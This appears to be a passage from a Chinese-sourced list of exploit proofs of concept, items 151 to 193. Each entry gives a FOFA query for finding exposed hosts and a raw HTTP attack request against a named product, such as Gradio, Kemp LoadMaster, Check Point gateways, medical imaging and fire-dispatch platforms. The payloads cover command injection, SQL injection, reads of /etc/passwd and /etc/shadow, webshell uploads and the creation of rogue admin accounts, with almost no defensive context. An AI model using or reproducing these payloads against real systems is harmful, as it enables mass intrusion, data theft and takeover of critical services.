Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: copy the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the temporary file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianwell fire rescue combat dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. 六零导航页 (LyLme Spage) file.php arbitrary file upload
CVE-2024-34982
FOFA: title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Visit the echoed file: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA: "Location: /login.rsp"
· TBK DVR-4104
· TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA: body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA: "INFINITT" && (icon_hash="1474455751" || icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA: title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓全智能停车收费系统 (smart parking fee system) Webservice.asmx arbitrary file upload
FOFA: body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰多媒体信息发布系统 (multimedia information publishing system) QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团分销管理系统 (distribution management system) ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园(安校易)管理系统 (smart campus management system) FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL: https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信票务管理平台 (ticketing management platform) SeatMapHandler SQL injection
FOFA: body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (lean value management system) DownLoad.aspx arbitrary file read
FOFA: body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA: app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA: app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA: body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星CMSV6车载定位监控平台 (vehicle GPS monitoring platform) SQL injection
FOFA: body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT high-definition license plate recognition camera arbitrary file read
FOFA: app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA: app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA: app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA: app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA: body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA: header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文工程管理系统 (engineering project management system) arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA: app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技企业标准化管理系统 (enterprise standardization management system) UpdataLogHandler.ashx SQL injection
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技企业标准化管理系统 (enterprise standardization management system) AddNewsHandler.ashx arbitrary user creation
FOFA: "PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创图书馆集群管理系统 (Interlib library cluster management system) updOpuserPw SQL injection
FOFA: body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA: server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼应用虚拟化系统 (REALOR application virtualization system) SQL injection
version < 7.0.5.1
FOFA: app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA: title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA: "Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. LANWON (蓝网科技) Clinical Browsing System deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short Video Matrix Marketing System (短视频矩阵营销系统) poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. ESAFENET (亿赛通) Electronic Document Security Management System NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. Hillstone (山石网科) 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
